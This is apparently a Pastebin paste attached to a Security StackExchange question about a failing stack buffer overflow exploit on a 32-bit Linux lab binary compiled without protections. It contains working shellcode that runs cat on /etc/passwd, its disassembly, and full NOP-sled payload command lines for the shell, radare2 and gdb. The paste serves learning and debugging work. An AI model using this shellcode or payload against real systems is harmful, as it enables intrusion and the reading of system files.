Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Question URL: http://security.stackexchange.com/questions/148351/
- // Shellcode, which I built and intend to cat /etc/passwd. It worked just fine on several exploits I did before:
- char[] shellcode = "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
- // Objdump of shellcode file:
- $ objdump -d shellcode.o
- shellcode.o: file format elf32-i386
- Disassembly of section .text:
- 00000000 <_start>:
- 0: 31 c0 xor %eax,%eax
- 2: 99 cltd
- 3: 52 push %edx
- 4: 68 2f 63 61 74 push $0x7461632f
- 9: 68 2f 62 69 6e push $0x6e69622f
- e: 89 e3 mov %esp,%ebx
- 10: 52 push %edx
- 11: 68 73 73 77 64 push $0x64777373
- 16: 68 2f 2f 70 61 push $0x61702f2f
- 1b: 68 2f 65 74 63 push $0x6374652f
- 20: 89 e1 mov %esp,%ecx
- 22: 52 push %edx
- 23: 51 push %ecx
- 24: 53 push %ebx
- 25: 89 e1 mov %esp,%ecx
- 27: b0 0b mov $0xb,%al
- 29: cd 80 int $0x80
- ----------
- // Command lines and arguments:
- // I try to exploit the program using several ways, I'll paste here few:
- // Simple shell execute //
- $ ./vuln $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
- // or read the payload from a file
- $ ./vuln $(cat payload)
- // RADARE2 //
- // Open the program in radare2:
- $ r2 -d ./vuln // open in debug mode
- // inside r2:
- // Reopen in debugger mode with args
- doo `!!python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"'`
- // GDB //
- (gdb) run $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
- // System details //
- $ uname -a
- Linux megabeets 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- $ file vuln
- ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=47ddbe5ef3c4c647670a8be51f2975c11a3501a6, not stripped
- // The program compiled using this GCC Command
- $ gcc vuln.c -o vuln -fno-stack-protector -m32 -z execstack
- ///////////////////
- // More details //
- /////////////////
- // Offset in payload that is overriding EIP: 76
- // Payload length: 80
- // NOP-sled length: 28
Add Comment
Please, Sign In to add comment